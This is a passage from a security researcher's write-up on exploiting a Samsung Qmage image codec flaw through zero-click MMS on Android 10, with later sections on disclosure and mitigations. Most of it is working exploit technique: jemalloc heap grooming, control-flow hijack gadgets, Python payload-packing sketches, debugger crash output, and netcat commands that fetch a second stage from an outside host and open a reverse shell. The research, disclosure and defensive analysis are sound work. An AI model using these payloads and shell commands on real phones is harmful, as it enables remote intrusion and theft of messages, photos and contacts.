We already know that we can't reach the external.freeFunc pointer without corrupting the other two fields in the structure. However, let's consider what happens if we still cause the heap → external type confusion by switching android::Bitmap.mPixelStorageType to External, but stop the overflow at that and don't corrupt anything beyond offset 0x70. As expected, external.address will assume the value of heap.address, external.context will be equivalent to heap.size, and external.freeFunc will remain uninitialized, because there is no corresponding field at that offset in the heap structure. Later on, when execution reaches the Bitmap::~Bitmap destructor, it will attempt to call the uninitialized function pointer. At that point, the first argument points to a buffer with our data (great!), but we don't really control the instruction pointer… or do we?

In order to set the uninitialized android::Bitmap.external.freeFunc field to some specific value, we would have to trigger an allocation in the same bucket as the Bitmap (129-160 bytes), fill it with our data, have it freed, have one other chunk in that bin size freed, and then have the Bitmap object allocated shortly after. This is caused by jemalloc's LIFO tcaches, which return the most recently freed region in the given bin size, and the fact that the Bitmap creation involves two 160-byte allocations: one for the (overflown) pixel buffer and the other for the C++ object itself. To reiterate, here's an example of a desired set of heap operations that would allow us to control external.freeFunc:

  1. malloc(160) → X
  2. malloc(160) → Y
  3. /* write controlled data to Y */
  4. free(Y);
  5. free(X);
  6. malloc(160) → X (Bitmap pixel backing buffer)
  7. malloc(160) → Y (Bitmap C++ object)

The Bitmap object is generally allocated very early in the image decoding process, but there is a bit of Qmage-related code that executes right before it: the header parsing code reached through the SkQmgCodec::MakeFromStream → ParseHeader → QuramQmageDecParseHeader chain of calls. We can use the SkCodecFuzzer harness with the -l option to obtain a list of heap-related function calls made during header parsing, on the example of the Qmage test file:

malloc(      1216) = {0x408c0f8b40 .. 0x408c0f9000}
malloc(        48) = {0x408c0fafd0 .. 0x408c0fb000}
malloc(      1176) = {0x408c0fcb68 .. 0x408c0fd000}
malloc(      1176) = {0x408c106b68 .. 0x408c107000}
malloc(        17) = {0x408c108fef .. 0x408c109000} ───┐ (X)
malloc(      1024) = {0x408c10ac00 .. 0x408c10b000} ──┐│ (Y)
malloc(      7160) = {0x408c10c408 .. 0x408c10e000} ─┐││ (Z)
free(0x408c10c408) <─────────────────────────────────┘││
free(0x408c10ac00) <──────────────────────────────────┘│
free(0x408c108fef) <───────────────────────────────────┘
malloc(       792) = {0x408c139ce8 .. 0x408c13a000}
malloc(        48) = {0x408c13bfd0 .. 0x408c13c000}
[+] Detected image characteristics:
[+] Dimensions:      4 x 10
[+] Color type:      4
[...]

In the above listing, call stacks were edited out for brevity, and the trace was adjusted to match the allocations sequence observed on a real Android device. There are a few malloc calls, but most of them outlive the header parsing process, except for the three allocations of size 17, 1024 and 7160, marked (X), (Y) and (Z) above. They are all made during the decompression of the optional color table, and serve the following purposes:

  • Region X (17 bytes) is used to store the raw, zlib-compressed color table read directly from the input Qmage stream.
  • Region Y (1024 bytes) is used to store the inflated color table, which further undergoes some Qmage-specific processing.
  • Region Z (7160 bytes) is a fixed-size inflate_state structure allocated inside inflateInit2_.

Considering that both the length and contents of regions X and Y are user-controlled, they match our requirements just perfectly. If we make them both between 129-160 bytes long, and set up the deflated data to have a specific 64-bit value at offset 0x90, then the pixel buffer will reuse region X, the Bitmap object will reuse region Y, and the freeFunc pointer will inherit the specially crafted value from the color table. This can be confirmed with a simple heap-tracing Frida script attached to the com.samsung.android.messaging process:

[9698] malloc(160) => 0x75aad1e980 ────┐    (deflated color table)
[9698] calloc(1, 152) => 0x75aad1ea20 ─┼─┐  (inflated color table)
[9698] malloc(7160) => 0x75b5557000    │ │
[9698] free(0x75b5557000)             (X)│
[9698] free(0x75aad1ea20)              │ │
[9698] free(0x75aad1e980)              │(Y)
[9698] malloc(792) => 0x75b5683500     │ │
[9698] malloc(48) => 0x7649a96140      │ │
[9698] calloc(160, 1) => 0x75aad1e980 <┘ │  (pixel buffer)
[9698] malloc(160) => 0x75aad1ea20 <─────┘  (android::Bitmap object)

Indeed, both regions allocated in the color table handling were then reused for the Bitmap object. If we set the freeFunc pointer to all 0x41's, and configure the first few pixels of the bitmap to contain an ASCII string, we should be able to trigger the following crash via MMS:

Thread 46 "pool-8-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 22783.23006]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x000000754e54ba60  →  "Hello, world!"
$x1  : 0xa0
[...]
$pc  : 0x41414141414141
$cpsr: [NEGATIVE zero carry overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644d6df00 in android::Bitmap::~Bitmap() ()
Backtrace stopped: Cannot access memory at address 0x75b61149c8
gef➤

Success! We have managed to hijack the control flow while having the first argument (X0 register) point to a text string of our choice, without having to leak its address. Before using this primitive to execute commands, let's quickly review an alternative method to achieve this outcome.

Technique #2 – libwebp to the rescue

If we look at the full definition of the android::Bitmap class, as presented in Part 3, we'll notice that the address of the pixel buffer is stored not just in the heap.address field at offset 0x80, but also at offset 0x18 as part of the SkPixelRef base class:

  /* +0x18 */ void*   fPixels;

This means that to achieve our goal, we should look for routines which call a function pointer loaded from some offset within the this object, and pass the value at offsets 0x18 or 0x80 of this as its first argument. We could then point the fake vtable at that function, provided that there is a reference to it somewhere in static memory of libhwui.so or linker64.

One example of such a fitting gadget that I have found is the static Execute function used in libwebp, which is compiled into libhwui.so (not once but twice, thanks to the Qmage codec):

static void Execute(WebPWorker* const worker) {
  if (worker->hook != NULL) {
    worker->had_error |= !worker->hook(worker->data1, worker->data2);
  }
}

A static pointer to it is located in the global g_worker_interface structure:

static WebPWorkerInterface g_worker_interface = {
  Init, Reset, Sync, Launch, Execute, End
};

It calls a function pointer with two arguments, both of them loaded from an input WebPWorker structure. Let's compare it side-by-side with the prologue of android::Bitmap:

typedef struct {
  /* +0x00 */ void* impl_;
  /* +0x08 */ WebPWorkerStatus status_;
  /* +0x10 */ WebPWorkerHook hook;
  /* +0x18 */ void* data1;
  /* +0x20 */ void* data2;
} WebPWorker;

struct android::Bitmap {
  /* +0x00 */ void*   vtable;
  /* +0x08 */ int32_t fRefCnt;
  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;
};

This layout checks all the boxes for successful exploitation: data1 overlaps with fPixels, the hook function pointer is stored before it, and there is still enough room left for the fake vtable pointer and refcount. It would be hard to imagine more convenient circumstances, as we get a reliable, controlled call with a string argument with just a minor Bitmap overflow of 0x18 bytes:

  • vtable → &g_worker_interface.Sync in libhwui.so,
  • fRefCnt → 1,
  • fHeight (full 64-bit value at offset 0x10) → destination $PC value
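
To make the layout tangible, here is a sketch of how that 0x18-byte overflow tail could be packed; the libhwui.so base is whatever value the ASLR bypass produced, and the offset of &g_worker_interface.Sync is a placeholder rather than the real figure from the firmware:

# Sketch: pack the 0x18 bytes that turn the android::Bitmap prologue into a fake WebPWorker.
import struct

LIBHWUI_BASE    = 0x74dd777000            # example value leaked by the ASLR bypass
SYNC_PTR_OFFSET = 0x7c0000                # placeholder offset of &g_worker_interface.Sync
FAKE_PC         = 0x4141414141414141      # where the hijacked hook call should land

tail  = struct.pack("<Q", LIBHWUI_BASE + SYNC_PTR_OFFSET)    # +0x00 fake vtable pointer
tail += struct.pack("<i", 1)                                 # +0x08 fRefCnt
tail += struct.pack("<i", 0)                                 # +0x0C fWidth (don't care)
tail += struct.pack("<Q", FAKE_PC)                           # +0x10 hook / fHeight
assert len(tail) == 0x18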

We can once again test it via MMS against the Messages app:

Thread 45 "pool-9-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 13453.13651]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007520edcb20  →  "Hello, world!"
$x1  : 0x10
[...]
$pc  : 0x41414141414141
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
0x0041414141414141 in ?? ()
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644bb78d4 in Execute ()
#2  0x0000007644d9c670 in SkBitmap::~SkBitmap()
#3  0x0000007647952f80 in doDecode
#4  0x0000007647951c90 in nativeDecodeStream
#5  0x0000000072494ff4 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤

This gets us within arm's reach of popping a shell on the remote device. There's just one last detail to take care of…

Adjusting the second argument

As mentioned earlier, the major difference between libc's system() and linker64's __dl_popen() is that the latter expects a pointer to readable memory in the second argument:

FILE* popen(const char* cmd, const char* mode);

Unfortunately, both techniques for setting the first parameter to a string clobber the second one with a small integer, which is never a valid pointer (see the X1 register values in the crash logs above). To solve the problem, we need to use an extra, intermediate gadget that will call another function pointer, pass through the first string argument and initialize the second one to a valid address. The ReadStreaEndError function, which is an (unused) part of the Qmage codec in libhwui.so, is the perfect candidate for the task. It operates on a structure that I have reverse-engineered and called QmageStream:

struct QmageStream {
  /* +0x00 */ void *data;
  /* +0x08 */ size_t offset;
  /* +0x10 */ size_t size;
  /* +0x18 */ int (*ReadStream)(QmageStream *stream, void *dst, size_t size);
};

The function's purpose is to read two bytes from the input stream and check if they're equal to "\xFF\x00" (in C-like pseudo code, with the QMG_CopyData wrapper edited out for clarity):

int ReadStreaEndError(QmageStream *stream) {
  unsigned char bytes[2];
  int result;

  result = stream->ReadStream(stream, bytes, 2);
  if (result >= 0 && (bytes[0] != 0xFF || bytes[1] != 0)) {
    result = -29;
  }

  return result;
}

So a function pointer from offset 0x18 of the input structure is called here, with the first argument set to the beginning of that structure, and the second being an address on the stack. That's exactly what we need, with the only downside being that the gadget limits the length of our shell command to 23 characters, since the string has to share the structure with the ReadStream pointer at offset 0x18, leaving 24 bytes for the command including its null terminator:

Thread 24 "pool-5-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 19535.20843]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007551ccad20  →  "It's a 23-byte command!"
$x1  : 0x000000755162f984  →  0x97e5e8ab00000000
[...]
$pc  : 0x42424242424242
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242424242
───────────────────────────────────────────────────────
0x0042424242424242 in ?? ()
gef➤  hexdump $x0 L32
0x0000007551ccad20     49 74 27 73 20 61 20 32     It's a 2
0x0000007551ccad28     33 2d 62 79 74 65 20 63     3-byte c
0x0000007551ccad30     6f 6d 6d 61 6e 64 21 00     ommand!.
0x0000007551ccad38     42 42 42 42 42 42 42 42     BBBBBBBB
gef➤  bt
#0  0x0042424242424242 in ?? ()
#1  0x0000007644b6636c in ReadStreaEndError ()
Backtrace stopped: Cannot access memory at address 0x755162f9a8
gef➤

Both arguments are now compatible with the definition of __dl_popen, and if we change "BBBBBBBB" to the address of that function, we'll be able to execute arbitrary (though relatively short) commands!
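
As an illustration, the 0x20-byte fake QmageStream could be assembled like this; the linker64 base comes from the ASLR bypass, while the __dl_popen offset is a placeholder for the value taken from the firmware's linker64 binary:

# Sketch: fake QmageStream carrying the shell command and the __dl_popen pointer.
import struct

LINKER64_BASE   = 0x733e649000            # example value leaked by the ASLR bypass
DL_POPEN_OFFSET = 0x50000                 # placeholder offset of __dl_popen in linker64

cmd = b"nc <host> <port>|sh"              # up to 23 characters plus the null terminator
fake_stream  = cmd.ljust(0x18, b"\x00")   # command string, NUL-padded up to offset 0x18
fake_stream += struct.pack("<Q", LINKER64_BASE + DL_POPEN_OFFSET)  # stream->ReadStream
assert len(fake_stream) == 0x20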

Popping a (reverse) shell

While 23 characters is not much, it is perfectly sufficient to convert the short command to a full-fledged reverse shell. Android devices ship with toybox, a Unix command line tool set that includes some standard networking utilities, such as netcat. Unfortunately, the Android build of nc doesn't support the -e flag, which is the canonical way to set up a reverse shell, but we can work around that. One easy solution is to connect to a remote host and load a new command without any length restrictions, and pipe it to sh:

nc <host> <port>|sh

It's very short, leaving up to 16 bytes for the combined length of the host and port, which is plenty of space. According to my testing, the direct "nc" symlink was introduced as recently as Android 10, but even when invoking netcat through the full "toybox nc" command on Android 9 and earlier, there are 9 characters left for the host/port, and 6-letter domains are still easily registered today. In my case, let's assume I executed the following line:

nc 12.34.56.78 1338|sh

Then on port 1338 of the remote host, I served the second stage payload:

tail -n 0 -f /data/data/com.samsung.android.messaging/1 | /bin/sh -i 2>&1 | nc 12.34.56.78 1337 1> /data/data/com.samsung.android.messaging/1

This is a cool trick to spawn a reverse shell with nc without the -e option, which I found here. It pipes together tail, sh and nc to achieve the result, and uses a temporary file (in a path accessible to the target process) to store the input commands. The gist of the trick is the -f tail option, used to pass commands to sh as they arrive over the network, providing the interactive feel. Once we send the above payload on port 1338, we should momentarily receive another connection on port 1337 with the full reverse shell:

$ nc -l -p 1337 -v
Listening on [0.0.0.0] (family 0, port 1337)
Connection from <redacted> 8632 received!
/bin/sh: can't find tty fd: No such device or address
/bin/sh: warning: won't have full job control
:/ $

And that's it! As shown in the exploit demo, the attacker now has remote access to the device in the security context of the Samsung Messages app. This effectively means that they can access the SMS/MMS messages, photos, contacts, and a number of other types of information on the phone. Given that the vulnerable Qmage codec is baked so deeply in Samsung Android, the attacker could try to further expand their reach in the system by exploiting the same vulnerability locally, compromising the context of another app and gaining access to its data. One example of a potential attack target is the com.android.systemui process, which is highly privileged by nature and is responsible for handling images supplied by other apps to be displayed in notifications. In a similar vein, some degree of persistence could be established by planting an exploit .qmg file in the file system, and having it connect back to a remote host every time the user opens the Gallery app. Once initial command line access to the target phone is obtained, the possibilities of abusing Qmage bugs locally are virtually endless.

Future work

The journey of developing a zero-click MMS exploit against a modern Samsung phone running Android 10 comes to an end. The fundamental reason why the attack was possible was the custom, exceedingly fragile image codec built into Android Skia by Samsung. In order to address the immediate problem, I ran two Qmage fuzzing sessions and reported the resulting crashes to the vendor: one in January 2020 (fixed in May as SVE-2020-16747 / CVE-2020-8899), and a subsequent one in May (fixed in July as SVE-2020-17675). I would like to believe that the codec is now in a much better shape, but I encourage other members of the security community to continue testing it, either with the existing SkCodecFuzzer harness or other custom tools.

While Qmage is the primary culprit here, the vulnerabilities created a great opportunity to test the effectiveness of various Android 10 mitigations and design decisions against low-level exploitation in a realistic setting. Throughout the process, I managed to take advantage of weaknesses in various parts of the OS; some of them provided only minor help, while others were absolutely critical to the feasibility of the exploitation:

  • The Samsung Messages app automatically downloads incoming MMS messages and parses attached images without user interaction and before completing communication with the MMSC, which opens up the remote attack surface and enables the creation of a crash-based ASLR oracle.
  • The image parsing code executes in the same process as the client app, and is not sandboxed the way video codecs are.
  • The Android ASLR suffers from several flaws:
    • The Zygote design causes a persistent address space layout across subsequent instances of a crashing app, enabling partial ASLR side channel output to be accumulated over time and combined into a complete ASLR bypass.
    • The sizable CFI shadow region makes it possible to blindly locate readable memory in the address space with an ASLR oracle.
    • The relative entropy between library mappings and the shadow area is quite low, especially for linker64.
    • The presence of execute-only mappings makes it easy to recognize specific shared objects with an oracle, even if they are tightly packed in memory.
  • The crash handling logic in ActivityManager allows for infinite restarts of an unstable app, provided that no two crashes occur within 60 seconds of each other (measured with the uptimeMillis clock).
  • The jemalloc heap allocator has generally favorable properties for exploitation: it's deterministic, doesn't have inline metadata, groups chunks by size, and implements tcaches which may help control uninitialized heap memory with a high degree of precision.
  • Android allows apps to spawn native command-line programs through functions like execve, system, __dl_popen etc. The system also includes networking tools such as netcat, which can be trivially used to set up a reverse shell for convenient remote access post-exploitation.

The above list gives a good overview of the areas for improvement, and we are working with both Android and Samsung to address them and introduce new hardening measures in future versions of the OS and the Samsung Messages app. In some areas, work had already been in motion before this project; for example the upcoming Android 11 fully switches from jemalloc to Scudo as its default heap allocator, and XOM is reverted because it breaks PAN. Furthermore, the effort has already led to some changes in ASLR:


All of these mitigations already make an MMS exploit substantially harder to develop, but there is still a lot of work to do. I will strive to push for further fixes in the areas enumerated above, to make sure that similar zero-click attacks against Android devices cannot be replicated in the future.

Conclusion

The blog post series demonstrated that there are still some very attractive and largely unexplored code bases written in memory-unsafe languages and exposed in widely used software today. It strikes me that the Qmage codec has stayed out of the public eye for so long, evading any kind of fuzzing or manual audit. It raises the question of how much other untested code runs on our desktops and mobile devices every day that we know nothing about, and it highlights the importance of transparency from software vendors. It's in the interest of users to be well-informed about the relevant attack surface, and to benefit from the collective work of the security community researching publicly documented code. Otherwise, bad actors are more incentivized to look for little-known, sensitive software components, and exploit them secretly. In that context, security by obscurity doesn't work, especially if obscurity is the primary element of the software security model.

Another takeaway is that successful exploitation of memory corruption issues in zero-click scenarios is still possible, despite significant efforts being made to mitigate such attacks. Admittedly, the existing security measures in Android made the exploitation harder, slower and less reliable; specifically, thanks to address randomization and the crash handling logic, the attack took between 1 and 2.5 hours and a long series of messages instead of a single one. However, none of them ultimately stopped the exploit, and all it took to bypass ASLR was the forgotten feature of MMS delivery reports coupled with a strong address probing primitive.

Clearly, memory corruption is far from a solved problem, and keeping our systems secure requires continued work on all levels of software design and development. As we've seen, even minor decisions seemingly unrelated to security – whether to allow unlimited restarts of frequently crashing apps – can make the difference between a feasible and thwarted exploit. This is where offensive exercises like this one bring the most value, as they help discern effective mitigations from futile ones, and guide further defensive work towards the areas that matter the most. On that note, I am especially looking forward to some new, fundamental advancements, such as the shift towards fast memory-safe languages like Rust, and widespread use of hardware-assisted mitigations such as Memory Tagging Extension.